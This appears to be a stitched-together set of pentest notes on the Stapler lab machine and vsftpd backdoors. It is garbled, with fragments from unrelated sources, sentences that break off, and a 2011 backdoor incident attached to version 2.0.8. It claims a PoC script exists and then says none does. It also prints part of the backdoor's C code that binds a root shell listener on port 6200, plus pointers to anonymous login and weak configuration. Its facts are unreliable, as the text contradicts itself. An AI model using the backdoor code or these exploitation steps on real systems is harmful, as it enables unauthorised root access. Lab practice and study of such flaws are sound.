Stapler: 1
* vsftpd 2.0.8 or later.
* OpenSSH 7.2p2.
* MySQL 5.7.12-0ubuntu1.
* PHP cli server 5.5.
* Samba 4.3.9.

ftp-vsftpd-backdoor NSE script - Nmap
msf6 > run
In July 2011, the primary download server for vsftpd (Very Secure FTP Daemon) was compromised by an unknown attacker.
From there, any command can be executed with root privileges.
Improper handling of certain globbing patterns in the deny_file configuration.
: A feature to remove temporary files or log entries created during the exploit attempt to minimize the footprint on the target system.
The modified source code contained a few extra lines in str.c and vsftpd.c. When the malicious daemon started, it would open a backdoor shell on port 6200. Crucially, authentication was bypassed. Any attacker who connected to port 6200 would receive a root shell instantly.
There are several proof-of-concept (PoC) exploits available on GitHub that demonstrate the vulnerability. One such exploit is the vsftpd_2.0.8_exploit.py script, which can be used to test the vulnerability.
```c
int fd, rfd;
struct sockaddr_in sa;

if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if ((bind(fd, (struct sockaddr *)&sa, sizeof(struct sockaddr))) < 0)
    exit(1);
if ((listen(fd, 100)) == -1)
    exit(1);
```
There is no single "magic" exploit code on GitHub for version 2.0.8 like there is for the 2.3.4 backdoor. Instead, this version is frequently exploited through misconfiguration or information disclosure.

* Anonymous Login: By default, many older installations allow anonymous FTP login.
If the version is indeed v2.0.8, look for weak configuration files (usually located at /etc/vsftpd.conf). High-risk lines include:
When you search the keyword, you will find three main categories: